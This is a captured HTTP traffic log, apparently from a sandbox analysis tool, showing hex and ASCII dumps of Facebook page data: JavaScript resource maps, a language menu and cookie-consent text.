                                                                                                                2022-10-13 11:08:02 UTC3822INData Raw: 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 6e 4b 36 42 69 44 59 50 72 6b 54 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 53 57 78 33 79 4e 76 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 57 5c 2f 72 5c 2f 4f 5f 53 6a 64 63 52 2d 78 4b 4c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 78 32 32 4f 62 79 34 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 30 5c 2f 72 5c 2f 66 4e 33 63 43 6a 37 49 6c
                                                                                                                Data Ascii: \/l\/en_US\/nK6BiDYPrkT.js?_nc_x=Ij3Wp8lg5Kz"},"SWx3yNv":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yW\/r\/O_SjdcR-xKL.js?_nc_x=Ij3Wp8lg5Kz"},"x22Oby4":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y0\/r\/fN3cCj7Il
                                                                                                                2022-10-13 11:08:02 UTC3824INData Raw: 22 2c 22 68 33 5a 7a 41 6d 47 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 5c 2f 6f 64 52 52 34 57 22 2c 22 50 79 63 43 55 45 4d 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 2c 22 72 22 3a 5b 22 42 49 79 6c 4b 43 34 22 2c 22 68 4b 59 30 51 4b 54 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 44 4f 4d 22 3a 7b 22 72 22 3a 5b 22 38 7a 62 45 5a 74 75 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 5c 2f 6f 64 52 52 34 57 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 46 6f 72 6d 22 3a 7b 22 72 22 3a 5b 22 38 7a 62 45 5a 74 75 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 5c 2f 6f 64 52 52 34 57 22 5d 2c 22 62 65 22 3a 31 7d 2c 22
                                                                                                                Data Ascii: ","h3ZzAmG","n6W4xMH","vGt2mxz","\/odRR4W","PycCUEM"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent"],"r":["BIylKC4","hKY0QKT"]},"be":1},"DOM":{"r":["8zbEZtu","vGt2mxz","\/odRR4W"],"be":1},"Form":{"r":["8zbEZtu","Z2GjVu9","vGt2mxz","\/odRR4W"],"be":1},"
                                                                                                                2022-10-13 11:08:02 UTC3825INData Raw: 22 6d 52 70 44 77 6d 64 22 2c 22 46 4a 76 47 4b 5c 2f 6a 22 2c 22 34 33 66 32 4c 2b 36 22 2c 22 70 32 36 65 5a 74 53 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 2c 22 51 51 4e 46 42 42 5c 2f 22 2c 22 68 4c 4e 34 44 33 41 22 2c 22 42 4b 58 30 32 50 47 22 2c 22 44 31 5c 2f 4a 54 6d 54 22 2c 22 64 48 73 4a 51 36 79 22 2c 22 4f 64 70 4f 33 57 46 22 2c 22 6b 5a 55 78 35 76 6d 22 2c 22 52 70 4d 75 38 48 64 22 2c 22 4a 4a 44 51 59 4c 64 22 2c 22 59 79 46 76 78 65 64 22 2c 22 79 6c 4c 50 6b 6a 41 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 59 74 55 33 43 35 75 22 2c 22 61 75 42 30 62 4e 72 22 2c 22 64 4b 41 4c 64 4e 35 22 2c 22 69 57 64 61 75 6b 34 22 2c 22 50 79 63 43 55 45 4d 22 2c 22 58 58 44 64 6f 64 6c 22 2c 22 44 39 58 42 33 67 6a 22 2c 22 65 38 52 6b 4a 6f 79 22 2c 22
                                                                                                                Data Ascii: "mRpDwmd","FJvGK\/j","43f2L+6","p26eZtS","e9ANzw\/","QQNFBB\/","hLN4D3A","BKX02PG","D1\/JTmT","dHsJQ6y","OdpO3WF","kZUx5vm","RpMu8Hd","JJDQYLd","YyFvxed","ylLPkjA","Z2GjVu9","YtU3C5u","auB0bNr","dKALdN5","iWdauk4","PycCUEM","XXDdodl","D9XB3gj","e8RkJoy","
                                                                                                                2022-10-13 11:08:02 UTC3827INData Raw: 38 58 63 63 63 48 22 2c 22 4c 58 32 44 73 59 4e 22 2c 22 49 61 52 5c 2f 36 75 50 22 2c 22 63 69 48 4d 6e 67 78 22 2c 22 51 47 58 34 37 54 43 22 2c 22 65 45 50 37 62 42 46 22 2c 22 54 37 65 75 57 4c 4b 22 2c 22 6e 7a 41 4b 76 4c 79 22 2c 22 74 5c 2f 44 51 64 39 2b 22 2c 22 63 59 55 33 63 33 32 22 2c 22 30 37 4a 53 69 50 30 22 2c 22 64 78 5c 2f 41 67 70 4f 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 50 68 6f 74 6f 54 61 67 73 22 3a 7b 22 72 22 3a 5b 22
                                                                                                                Data Ascii: 8XcccH","LX2DsYN","IaR\/6uP","ciHMngx","QGX47TC","eEP7bBF","T7euWLK","nzAKvLy","t\/DQd9+","cYU3c32","07JSiP0","dx\/AgpO"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent","BanzaiScuba_DEPRECATED","PageTransitions","Animation"]},"be":1},"PhotoTags":{"r":["
                                                                                                                2022-10-13 11:08:02 UTC3828INData Raw: 22 72 22 3a 5b 22 68 49 65 6b 2b 62 47 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 50 65 72 66 58 53 68 61 72 65 64 46 69 65 6c 64 73 22 3a 7b 22 72 22 3a 5b 22 42 49 79 6c 4b 43 34 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 4f 44 53 22 3a 7b 22 72 22 3a 5b 22 38 7a 62 45 5a 74 75 22 2c 22 68 4b 59 30 51 4b 54 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 4b 65 79 45 76 65 6e 74 54 79 70 65 64 4c 6f 67 67 65 72 22 3a 7b 22 72 22 3a 5b 22 38 7a 62 45 5a 74 75 22 2c 22 47 6a 38 76 39 4c 34 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 42 49 79 6c 4b 43 34 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 44 69 61 6c 6f 67 22 3a 7b 22 72 22 3a 5b 22 58 39 6e 72 36 35 61 22 2c 22 38 7a 62
                                                                                                                Data Ascii: "r":["hIek+bG"],"be":1},"PerfXSharedFields":{"r":["BIylKC4"],"be":1},"ODS":{"r":["8zbEZtu","hKY0QKT"],"be":1},"KeyEventTypedLogger":{"r":["8zbEZtu","Gj8v9L4","hKY0QKT","BIylKC4"],"rds":{"m":["BanzaiScuba_DEPRECATED"]},"be":1},"Dialog":{"r":["X9nr65a","8zb
                                                                                                                2022-10-13 11:08:02 UTC3829INData Raw: 69 6e 65 54 61 62 4f 72 64 65 72 22 3a 7b 22 72 22 3a 5b 22 38 7a 62 45 5a 74 75 22 2c 22 79 6c 4c 50 6b 6a 41 22 2c 22 50 79 63 43 55 45 4d 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 38 6d 7a 67 59 75 35 22 2c 22 41 5c 2f 76 41 36 6a 45 22 2c 22 5c 2f 6f 64 52 52 34 57 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 42 75 74 74 6f 6e 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 52 35 77 31 72 43 4a 22 2c 22 5a 45 43 34 52 72 51 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 70 32 36 65 5a 74 53 22 2c 22 4f 64 70 4f 33 57 46 22 2c 22 4a 4a 44 51 59 4c 64 22 2c 22 79 6c 4c 50 6b 6a 41 22 2c 22 59 74 55 33 43 35 75 22 2c 22 50 79 63 43 55 45 4d 22 2c 22 65 38 52 6b 4a 6f 79 22 2c 22 68 33 5a 7a
                                                                                                                Data Ascii: ineTabOrder":{"r":["8zbEZtu","ylLPkjA","PycCUEM","lWOvGTa","vGt2mxz","BIylKC4","8mzgYu5","A\/vA6jE","\/odRR4W"],"be":1},"XUIDialogButton.react":{"r":["R5w1rCJ","ZEC4RrQ","8zbEZtu","p26eZtS","OdpO3WF","JJDQYLd","ylLPkjA","YtU3C5u","PycCUEM","e8RkJoy","h3Zz
                                                                                                                2022-10-13 11:08:02 UTC3831INData Raw: 7d 29 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 22 5d 2c 20 66 75 6e 63 74 69 6f 6e 28 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 29 20 7b 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 2e 6c 6f 61 64 4f 6e 44 4f 4d 43 6f 6e 74 65 6e 74 52 65 61 64 79 28 5b 22 6e 36 57 34 78 4d 48 22 2c 22 6d 6f 34 59 48 48 73 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 6d 52 70 44 77 6d 64 22 2c 22 68 33 5a 7a 41 6d 47 22 2c 22 5a 45 43 34 52 72 51 22 2c 22 63 59 55 33 63 33 32 22 2c 22 44 31 5c 2f 4a 54 6d 54 22 2c 22 5c 2f 72 4f 30 6c 62 6e 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22
                                                                                                                Data Ascii: })});</script><script>requireLazy(["InitialJSLoader"], function(InitialJSLoader) {InitialJSLoader.loadOnDOMContentReady(["n6W4xMH","mo4YHHs","BIylKC4","8zbEZtu","vGt2mxz","hKY0QKT","mRpDwmd","h3ZzAmG","ZEC4RrQ","cYU3c32","D1\/JTmT","\/rO0lbn","Z2GjVu9","
                                                                                                                2022-10-13 11:08:02 UTC3832INData Raw: 22 63 75 72 72 65 6e 74 5f 64 6f 6d 61 69 6e 22 3a 22 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 22 2c 22 62 6c 6f 63 6b 6c 69 73 74 65 64 5f 64 6f 6d 61 69 6e 73 22 3a 5b 22 61 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 22 2c 22 61 64 73 2d 65 6e 63 72 79 70 74 69 6f 6e 2d 75 72 6c 2d 65 78 61 6d 70 6c 65 2e 63 6f 6d 22 2c 22 62 73 2e 73 65 72 76 69 6e 67 2d 73 79 73 2e 63 6f 6d 22 2c 22 61 64 2e 61 74 64 6d 74 2e 63 6f 6d 22 2c 22 61 64 66 6f 72 6d 2e 6e 65 74 22 2c 22 61 64 31 33 2e 61 64 66 61 72 6d 31 2e 61 64 69 74 69 6f 6e 2e 63 6f 6d 22 2c 22 69 6c 6f 76 65 6d 79 66 72 65 65 64 6f 6d 73 2e 63 6f 6d 22 2c 22 73 65 63 75 72 65 2e 61 64 6e 78 73 2e 63 6f 6d 22 5d 2c 22 69 73 5f 6d 6f 62 69 6c 65 5f 64 65 76 69 63 65 22 3a 66 61 6c 73 65 7d 2c 32 37
                                                                                                                Data Ascii: "current_domain":"facebook.com","blocklisted_domains":["ad.doubleclick.net","ads-encryption-url-example.com","bs.serving-sys.com","ad.atdmt.com","adform.net","ad13.adfarm1.adition.com","ilovemyfreedoms.com","secure.adnxs.com"],"is_mobile_device":false},27
                                                                                                                2022-10-13 11:08:02 UTC3834INData Raw: 36 37 62 63 0d 0a 6e 64 6f 6e 65 73 69 61 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 64 61 5f 44 4b 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 31 5f 71 47 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 44 61 6e 73 6b 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64
                                                                                                                Data Ascii: 67bcndonesia","title":"","className":"headerItem"},{"class":"headerItem","value":"da_DK","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_1_qG"},"label":"Dansk","title":"","className":"headerItem"},{"class":"head
                                                                                                                2022-10-13 11:08:02 UTC3835INData Raw: 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 38 5f 76 36 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 49 74 61 6c 69 61 6e 6f 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 68 75 5f 48 55 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 39 5f 61 47 22 7d 2c
                                                                                                                Data Ascii: enuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_8_v6"},"label":"Italiano","title":"","className":"headerItem"},{"class":"headerItem","value":"hu_HU","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_9_aG"},
                                                                                                                2022-10-13 11:08:02 UTC3837INData Raw: 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 66 69 5f 46 49 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 67 5f 68 50 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 53 75 6f 6d 69 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 73 76 5f 53 45 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f
                                                                                                                Data Ascii: rItem"},{"class":"headerItem","value":"fi_FI","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_g_hP"},"label":"Suomi","title":"","className":"headerItem"},{"class":"headerItem","value":"sv_SE","selected":false,"cto
                                                                                                                2022-10-13 11:08:02 UTC3838INData Raw: 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6e 5f 4c 49 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 35 65 32 5c 75 30 35 64 31 5c 75 30 35 65 38 5c 75 30 35 64 39 5c 75 30 35 65 61 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 61 72 5f 41 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75
                                                                                                                Data Ascii: "ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_n_LI"},"label":"\u05e2\u05d1\u05e8\u05d9\u05ea","title":"","className":"headerItem"},{"class":"headerItem","value":"ar_AR","selected":false,"ctor":{"__m":"MenuSelectableItem"},"marku
                                                                                                                2022-10-13 11:08:02 UTC3840INData Raw: 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 75 5f 45 49 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 36 35 65 35 5c 75 36 37 32 63 5c 75 38 61 39 65 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 6b 6f 5f 4b 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a
                                                                                                                Data Ascii: d":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_u_EI"},"label":"\u65e5\u672c\u8a9e","title":"","className":"headerItem"},{"class":"headerItem","value":"ko_KR","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":
                                                                                                                2022-10-13 11:08:02 UTC3841INData Raw: 65 78 74 75 61 6c 4c 61 79 65 72 41 75 74 6f 46 6c 69 70 22 2c 22 43 6f 6e 74 65 78 74 75 61 6c 44 69 61 6c 6f 67 41 72 72 6f 77 22 2c 22 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 50 6f 73 69 74 69 6f 6e 43 6c 61 73 73 4f 6e 43 6f 6e 74 65 78 74 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 31 64 65 31 34 36 64 63 5f 30 5f 30 5f 6a 4d 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 65 63 37 37 61 66 62 64 5f 30 5f 30 5f 63 4c 22 7d 2c 5b 7b 22 5f 5f 6d 22 3a 22 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 41 75 74 6f 46 6c 69 70 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 43 6f 6e 74 65 78 74 75 61 6c 44 69 61 6c 6f 67 41 72 72 6f 77 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 50 6f 73 69 74 69 6f 6e 43 6c 61 73
                                                                                                                Data Ascii: extualLayerAutoFlip","ContextualDialogArrow","ContextualLayerPositionClassOnContext"],[{"__m":"__elem_1de146dc_0_0_jM"},{"__m":"__elem_ec77afbd_0_0_cL"},[{"__m":"ContextualLayerAutoFlip"},{"__m":"ContextualDialogArrow"},{"__m":"ContextualLayerPositionClas
                                                                                                                2022-10-13 11:08:02 UTC3843INData Raw: 6d 67 20 73 70 5f 33 67 45 6e 47 54 78 62 37 7a 65 20 73 78 5f 38 39 30 62 33 34 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 34 5c 22 3e 50 72 6f 76 69 64 65 20 61 20 73 61 66 65 72 20 65 78 70 65 72 69 65 6e 63 65 20 62 79 20 75 73 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 77 65 20 72 65 63 65 69 76 65 20 66 72 6f 6d 20 63 6f 6f 6b 69 65 73 20 6f 6e 20 61 6e 64 20 6f 66 66 20 46 61 63 65 62 6f 6f 6b 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 32 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 33 67 45 6e 47 54 78 62 37 7a 65 20 73 78 5f 61 61 66 62 64 35 5c 22 3e 5c
                                                                                                                Data Ascii: mg sp_3gEnGTxb7ze sx_890b34\">\u003C\/i>\u003Cdiv class=\"_9xo4\">Provide a safer experience by using information we receive from cookies on and off Facebook\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo2\">\u003Ci class=\"img sp_3gEnGTxb7ze sx_aafbd5\">\
                                                                                                                2022-10-13 11:08:02 UTC3844INData Raw: 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 70 2d 5c 22 3e 43 6f 6f 6b 69 65 73 20 66 72 6f 6d 20 6f 74 68 65 72 20 63 6f 6d 70 61 6e 69 65 73 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 69 5c 22 3e 57 65 20 75 73 65 20 74 6f 6f 6c 73 20 66 72 6f 6d 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 70 6f 6c 69 63 69 65 73 5c 2f 63 6f 6f 6b 69 65 73 5c 2f 23 6f 74 68 65 72 5f 63 6f 6d 70 61 6e 69 65 73 5f 73 65 63 74 69 6f 6e 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 76 5c 22 20 69 64 3d 5c 22 63 70 6e 2d 70 76 2d 6c 69 6e 6b 5c 22 3e 6f
                                                                                                                Data Ascii: v>\u003Cdiv class=\"_9xp-\">Cookies from other companies\u003C\/div>\u003Cdiv class=\"_9o-i\">We use tools from \u003Ca href=\"https:\/\/www.facebook.com\/policies\/cookies\/#other_companies_section\" target=\"_blank\" class=\"_9o-v\" id=\"cpn-pv-link\">o
                                                                                                                2022-10-13 11:08:02 UTC3845INData Raw: 20 79 6f 75 20 64 6f 6e 5c 75 32 30 31 39 74 20 61 6c 6c 6f 77 20 74 68 65 73 65 20 63 6f 6f 6b 69 65 73 3a 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 70 5c 22 3e 5c 75 30 30 33 43 75 6c 20 63 6c 61 73 73 3d 5c 22 5f 39 78 70 5f 5c 22 3e 5c 75 30 30 33 43 6c 69 20 63 6c 61 73 73 3d 5c 22 5f 39 78 71 30 5c 22 3e 57 65 20 77 6f 6e 5c 75 32 30 31 39 74 20 75 73 65 20 63 6f 6f 6b 69 65 73 20 66 72 6f 6d 20 6f 74 68 65 72 20 63 6f 6d 70 61 6e 69 65 73 20 74 6f 20 68 65 6c 70 20 70 65 72 73 6f 6e 61 6c 69 7a 65 20 61 64 73 20 66 6f 72 20 79 6f 75 20 6f 66 66 20 6f 66 20 46 61 63 65 62 6f 6f 6b 20 50 72 6f 64 75 63 74 73 2c 20 6f 72 20 74 6f 20 6d 65 61 73 75 72 65 20 74 68 65 69 72 20 70 65 72 66 6f 72 6d 61 6e 63
                                                                                                                Data Ascii: you don\u2019t allow these cookies:\u003C\/p>\u003Cp class=\"_9o-p\">\u003Cul class=\"_9xp_\">\u003Cli class=\"_9xq0\">We won\u2019t use cookies from other companies to help personalize ads for you off of Facebook Products, or to measure their performanc
                                                                                                                2022-10-13 11:08:02 UTC3847INData Raw: 67 73 5c 2f 61 64 73 5c 2f 5c 22 3e 61 64 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 61 3e 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 54 68 65 20 46 61 63 65 62 6f 6f 6b 20 41 75 64 69 65 6e 63 65 20 4e 65 74 77 6f 72 6b 20 69 73 20 61 20 77 61 79 20 66 6f 72 20 61 64 76 65 72 74 69 73 65 72 73 20 74 6f 20 73 68 6f 77 20 79 6f 75 20 61 64 73 20 69 6e 20 61 70 70 73 20 61 6e 64 20 77 65 62 73 69 74 65 73 20 6f 66 66 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 68 65 6c 70 5c 2f 31 39 35 32 32 37 39 32 31 32 35 32 34 30 30 5c 22 3e 46 61 63 65 62 6f 6f 6b 20 43 6f 6d 70 61 6e 79 20 50 72 6f
                                                                                                                Data Ascii: gs\/ads\/\">ad settings\u003C\/a>.\u003C\/p>\u003Cp class=\"_9o-m\">The Facebook Audience Network is a way for advertisers to show you ads in apps and websites off the \u003Ca href=\"https:\/\/www.facebook.com\/help\/195227921252400\">Facebook Company Pro
                                                                                                                2022-10-13 11:08:02 UTC3848INData Raw: 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 62 5f 35 34 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 64 20 5f 39 6e 67 65 5c 22 20 74 69 74 6c 65 3d 5c 22 65 78 70 61 6e 64 61 62 6c 65 20 73 65 63 74 69 6f 6e 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 63 5c 22 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 66 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6c 5c 22 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 6f 6e 6c 69 6e 65 20 61 64 76 65
